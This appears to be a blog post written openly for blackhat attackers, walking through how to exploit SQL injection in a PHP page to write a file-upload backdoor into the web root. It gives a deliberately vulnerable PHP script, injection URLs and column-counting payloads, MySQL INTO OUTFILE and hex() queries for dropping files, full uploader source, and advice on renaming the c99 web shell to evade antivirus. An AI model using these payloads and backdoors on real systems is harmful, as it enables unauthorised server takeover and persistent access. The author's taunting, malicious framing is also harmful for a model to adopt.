Uploading PHP Shell Through SQL Injection

Filed under SQL Injection
Tagged as , ,

Claimant – A little piece of advice

Article destined to any blackhat on the internet, all source codes and examples must be used for malicious purposes only, sue me for that. Learn with this short piece of information how things work, ’cause we drift toward war… despite the fact that white hats also fight against us (reporting our fake pages and for being prone to identify us for federals) we still can win the struggle, despise the other side. With a scalpel in our hands we’ll overcome the fucking security revealing scandals around the world, inhale the white hat powder. Where do we fit into that? The best thing about this little piece of spam is that it appeals to our blackhat hearts.

Acknowledgement – encore!

I offer this paper to F3rG0, Dark_Side (we were going to give him a plaque, but due to his lack of skill and our lack of money, it’s probably not going to happen), AciDmuD, VooDoo, Cheat Struck, dizziness, blurred vision, eye or muscle twitches and loss of consciousness πŸ™‚ e principalmente para Cleidiane Morais for being in a good mood to love in a moonlit day ,) My nape hurts! The cheat in this paper works perfectly on windows 7, windows vista, windows XP, windows 8 and 9 and etc (of course πŸ˜‰ I will do this in steps for no readily apparent reason besides to give the reader motion and emotion… with no repentance it will be cool…
“The key to your success is acting before the problem escalates.”

Getting Started

let’s write a index page or a simple page able to deal with SQL injection. Do a roaring trade (new employees…). But if you want rename as roastbeef.php

— index.php —

<title>Index Vulnerable</title>
<body bgcolor=”white”>
$id = $_GET[‘id’];
print “Page vulnerable to SQL Injection (no scant) – Vulture Demonstration</br>”;
print “==============================================<br>”;
$sqlquery = “SELECT * FROM information WHERE id=’$id'”;
echo “<b>SQL Query: </b>$sqlquery”.”<br><br>”;
$execute = mysql_query($sqlquery);

while ($row = mysql_fetch_array($execute)){
echo “<b>Name:</b> $row[1]</br><b>CC#:</b>$row[2]</br><b>Expiry

— cut here —

Now let’s write a database containing some useful data


Connecting to

Microsoft Windows [versΓ£o 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Todos os direitos reservados.
C:\Users\David>mysql -u root -p
Enter password: *********************
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5
Server version: 5.0.41-community-nt MySQL Community Edition (GPL)
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.

Creating the database

mysql> create database infobnk;
Query OK, 1 row affected (0.00 sec)
mysql> show databases\g
| Database |
| information_schema |
| infobnk |
| mysql |
| test |
4 rows in set (0.00 sec)
mysql> use infobnk\g
Query OK, 0 rows affected (0.00 sec)

Creating the table

mysql> create table information (id int, name TEXT, cc TEXT,
validade TEXT, rg TEXT);
Query OK, 0 rows affected (0.01 sec)
mysql> desc information\g
| Field | Type | Null | Key | Default | Extra |
| id | int(11) | YES | | NULL | |
| name | text | YES | | NULL | |
| cc | text | YES | | NULL | |
| validade | text | YES | | NULL | |
| rg | text | YES | | NULL | |
5 rows in set (0.00 sec)

Inserting data

mysql> insert into information values (1, “Tom Cruise”, “Visa, Numero:
4011.3001.6089.7014”, “10/2050″,”18306148-x”);
Query OK, 1 row affected (0.01 sec)
mysql> select * from infobnk.information where id=1\g
| id | name | cc | validade | rg
| 1 | Tom Cruise | Visa, Numero: 4011.3001.6089.7014 | 10/2050 | 18306148-x|
1 row in set (0.00 sec)

Like custom insert some more data

mysql> select * from information\g
| id | name | cc | validade | rg |
| 1 | Tom Cruise | Visa, Numero: 4011.3001.6089.7014 | 10/2050 | 18306148-x |
| 2 | blah | blah | blah | blah |
2 rows in set (0.02 sec)

Seeing how the page works – (awkward situation)

Example II:


Page vulnerable to SQL Injection (no scant) – Vulture Demonstration

SQL Query: SELECT * FROM information WHERE id=’2′
Name: blah
Expiry date:blah

without using nothing beyond an url manipulation we can change the data shown on the page, let’s test the sql injection properly said right now.


You may have noticed that after we insert the apostrophe sign we have the following error message:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in D:\Arquivos de programas\EasyPHP-5.3.1\www\index.php on line 21

that means that we can do a little party here πŸ™‚ Surprisingly we say “yeeeah”. As it can be noticed by you guys, the main focus of this article isn’t about explaining how sql injection works, but simply show how to
upload a php shell through it, but I’ll explain some basics to you, so let us continue the trek…

Try this too: http://localhost/?id=2’+or+1=1–+

Good spice! Respectively surrounded with colored circles you can see the corresponding data for each id. That’s a good crop. When talking about sql injection remember the select statement.


As you may be tired of knowing the “SELECT is used to retrieve rows selected from one or more tables, and can include UNION statements and subqueries”. For more information regarding them see the reference [1] but there are in this structure the needed information concerning the number of columns as you know because of the UNION statement. So, let’s do it right away:

http://localhost/?id=1’+order+by+1–+ No errors shown
http://localhost/?id=1’+order+by+4–+ Continue like that
http://localhost/?id=1’+order+by+5–+ Nothing in here
http://localhost/?id=1’+order+by+6–+ See the message below

Ok, the table has 5 columns. So lets finally test the statement select.

Hexadecimal Party

I have not personally seen this book, and I believe it may not be available (anymore), I simply “thought” about this method and it ran perfectly, so let us begin…

see this:


Instead of showing 414141 it was shown AAAA and that means the server “interprets” the hex code by using before the hex properly said the specifier of hex ‘0x’, now you may have a think about the “select into outfile” which was used in MySQL 3.23.55 and earlier to create world-writeable files and allow mysql users to gain root privileges by using the “SELECT * INTO OUTFILE” statement to overwrite a configuration file and cause mysql to run as root upon restart. Yes, we really can upload a php shell through the index page.

1 – Hex digits for the string AAAA
2 – Hex digits for the immortal Inconspicuous Uploader

As you can notice we don’t see anything being shown at camp 1, because of the source code of this index page (of course). For that reason I have selected the field 2. So we just need a shell and selecting the hex digits concerning to it into a file inside the directory

boolean given in D:\Arquivos de programas\EasyPHP-5.3.1\www\

As you also know ‘www’ is the directory for putting the web pages… as well πŸ˜‰ But isn’t so easy to get these hex digits for the shell πŸ™‚ you may think… but I’m here to show you how it works. After clicking on ‘Procurar…’ you’ll be immediately redirected to a searching window like this below:

Select a file, in my case an image. After that open it and click on ‘Enviar arquivo’ (Send file).

The message above is saying that:
O arquivo [5752199_300.jpg] foi enviado com sucesso.
The file has been uploaded successfully

Now let’s test it guy!

For some stupid reason I inserted the following path inside the php uploader:

$_path = “uploaded_files/”;
change it for
$_path = “”;

And sorry. I will not modify it anymore at the time of this writing.

The Uploader

Now you’ll have the source code able to upload files. It has been written when I was a disgusting nicotine junkie. This work perfectly, at least is rather than have to go out and search for a shoddy source code containing the following text: “educational purposes only” and blah, blah, blah. Fuck ya white hat

mysql> select load_file(‘D:/uploader.php’)\g

| load_file(‘D:/uploader.php’)
(more trash)
<!– Inconspicuous Uploader v2.5 by 6_Bl4ck9_f0x6 –>
<form enctype=”multipart/form-data” action=”uploader.php” method=”POST”>
<input type=”hidden” name=”MAX_FILE_SIZE” value=”2000000″/>
Arquivo local: <input name=”arquivo_local” type=”file”/><br/><br/>
<input type=”submit” value=”Enviar arquivo”/>
$_path = “uploaded_files/”;
$_path = $_path.basename($_FILES[‘arquivo_local’][‘name’]);
if (isset($_FILES[‘arquivo_local’][‘name’])) {
if(move_uploaded_file($_FILES[‘arquivo_local’][‘tmp_name’], $_path)) {
echo “O arquivo <b>[“.basename($_FILES[‘arquivo_local’][‘name’]).”]</b> foi
com sucesso.”;
} else {
echo “Ocorreu um erro ao enviar o arquivo <b>[” .
basename($_FILES[‘arquivo_local’][‘name’]).”]</b> tente novamente.”;
1 row in set (0.00 sec)

Some little problems

Ok, this uploader need become a hex string, but there’s a little problem here, learn how to bypass it. You may ask “ok, theres a problem how does it affect the hex code?”

mysql> select load_file(‘D:/uploader.php’) into outfile ‘D:/output.txt’\g
Query OK, 1 row affected (0.00 sec)

As you could see in the video[1] there’re some back slashes when we use the load_file() function, these suck back slashes are always included when we process the uploader through the function load_file(), the “blank spaces” between lines are filled with them. See it:

mysql> select load_file(‘D:/uploader.php’) into outfile
Query OK, 1 row affected (0.00 sec)

to avoid this annoying prob just put all the code in the same line and process it after that:

<html><!– Inconspicuous Uploader v2.5 by 6_Bl4ck9_f0x6 –><form enctype=”multipart/form-data” action=”uploader.php”
method=”POST”><input type=”hidden” name=”MAX_FILE_SIZE” value=”2000000″/>Arquivo local: <input name=”arquivo_local”
type=”file”/><br/><br/><input type=”submit” value=”Enviar arquivo”/></form></html><?php $_path = “uploaded_files/”; $_path =
$_path.basename($_FILES[‘arquivo_local’][‘name’]); if (isset($_FILES[‘arquivo_local’][‘name’]))
{ if(move_uploaded_file($_FILES[‘arquivo_local’][‘tmp_name’], $_path)) { echo “O arquivo
<b>[“.basename($_FILES[‘arquivo_local’][‘name’]).”]</b> foi enviado com sucesso.”; } else { echo “Ocorreu um erro ao enviar o
arquivo <b>[” . basename($_FILES[‘arquivo_local’][‘name’]).”]</b> tente novamente.”;}}?>

Pay attention to the fact that we don’t need to let spaces in the file, these such spaces cause insertion of \, and that may cause problems when executing the hexcodes.

Give me the hex codes

To get our hex codes we’ll need to use a MySQL function called hex(), it converts the ASCII in hex.

mysql> select hex(load_file(‘D:/uploader.php’)) into outfile ‘D:/output.hex’\g
Query OK, 1 row affected (0.01 sec)

See the hex codes:



by using the notepad you can’t copy the last character cuz that’s a null byte.

The Spider Shell

Unfortunately the c99 is being detect for some antivirus and stupid “security” tools, for that reason write a simple shell youself or try rename the c99.php for cnineninex33l.php hhahahash! stupid white hats you worthless sack of pillow stuffing:

the last one.png

— Ending —


Post a Comment

Your email is never published nor shared. Required fields are marked *